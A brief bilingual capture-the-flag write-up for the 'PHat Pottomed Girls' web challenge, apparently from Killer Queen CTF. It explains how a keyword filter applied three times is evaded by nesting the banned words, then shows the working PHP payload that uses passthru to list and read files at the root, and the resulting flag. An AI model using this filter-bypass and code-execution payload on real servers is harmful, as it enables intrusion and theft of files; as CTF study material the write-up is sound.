PHat Pottomed Girls

WebページのURLと、ファイル addnote.php が与えられた。
また、問題文より、flagはルートディレクトリにあるということだった。

addnote.php を読むと、PBjar CTF の ProgrammersHateProgramming 2 と同様に flagcat などの文字列を消す filter 関数があり、
入力データにこの filter 関数を3回適用した結果を .php で終わるファイル名のファイルに保存していた。

filter 関数を3回適用しているので、その分消してもらう文字列を3回挟むとよい。
以下の文字列を送信し、できたページにアクセスすることで、flagが得られた。

An URL of a web page and a file addnote.php were given.
Also, the challenge descryption said that the flag is in the root directory.

Reading addnote.php, I found a function filter that erases some strings including flag and cat like ProgrammersHateProgramming 2 in PBjar CTF,
and that it is storing the input data to a file whose name ends with .php after applying this function filter 3 times.

Since the function filter is applied 3 times, putting strings to be deleted 3 times should work.
I obtained the flag by sending this string and accessing the created page.

<flflflagagag? passthru("ls -al /"); passthru("ca" . "t /*");
flag{wait_but_i_fixed_it_after_my_last_two_blunders_i_even_filtered_three_times_:(((}

Killer Queen CTF